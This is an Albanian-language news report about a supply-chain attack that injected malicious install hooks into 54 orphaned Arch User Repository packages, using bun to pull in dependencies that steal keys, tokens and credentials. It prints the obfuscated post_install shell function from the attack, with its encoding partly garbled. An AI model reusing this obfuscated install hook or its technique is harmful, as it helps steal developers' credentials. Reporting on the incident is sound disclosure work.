Në AUR është realizuar injetimi i kodit të dëmshëm në gjithsej 54 paketa

Sido që masat e ndërmarra nga zhvilluesit e Arch Linux, aktiviteti i futjes së kodit të dëmshëm në repositorin AUR (Arch User Repository) nuk është ndalur. Disa orë më parë, kodi i dëmshëm u fut në 54 paketa të tjera, që mbetën pa kujdestarë (historiku i anulimeve të të dhënave të dëmshme). Ndryshe nga sulmet e djeshme, kësaj here është përdorur platforma bun për të instaluar varësitë e dëmshme në vend të menaxherit të paketave npm. Për të anashkaluar filtrat e realizuar, një varg i obfuskatuar është futur në funksionin post_install, i cili thërret komandën "bun add" për të instaluar paketat me kod të dëmshëm, që skanojnë dhe dërgojnë të dhëna në të jashtme. server çelësave, tokenëve dhe kredencialeve.

post_install() {
$’\x63â€Č»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73â€Č ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}

Burimi: opennet.ru

Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster